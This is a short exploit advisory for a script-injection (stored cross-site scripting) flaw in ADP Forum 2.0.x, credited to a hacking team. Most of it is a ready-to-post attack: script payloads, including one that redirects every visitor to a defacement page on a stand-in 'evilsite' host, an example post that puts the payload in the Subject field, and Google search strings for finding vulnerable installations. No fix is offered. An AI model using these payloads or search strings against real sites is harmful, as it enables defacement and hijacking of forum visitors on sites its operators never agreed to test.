ADP Forum 2.0,* script İnjection ---------------------------------------------------- site:http://www.linux.it/~fedro/ demo:http://www.adp.host.sk/Forum203/ -------------------------------------------------- Post This Code: <script>alert(/Liz0ziM/)</script> <script>location.href="http://evilsite.com/deface.html";;</script> vs.. --------------------------------------------------------- Example Post Message : Name :Liz0ziM Username :username Password :password E-mail :liz0@xxxxxxxxxxx Subject :<script>location.href="http://evilsite.com/deface.html";;</script> Message :LOL :=) --------------------------------------------------------- Credit:Liz0ziM Mail :liz0@xxxxxxxxxxx Site :www.biyosecurity.com BiyoSecurityTeam: Liz0ziM,Codexploder'tq,r00t3rr0r,y3LL0w ------------------------------------------------------------ google: "ADP Forum 2.0.3 is powered by VzScripts" "ADP Forum 2.0.2" "ADP Forum 2.0.1" "ADP Forum 2.0" ------------------------------------------------------------ Source: http://www.blogcu.com/Liz0ziM/338614/ http://biyosecurity.be/bugs/adpforum2.html http://biyosecurity.be/bugs/adpforum2.txt
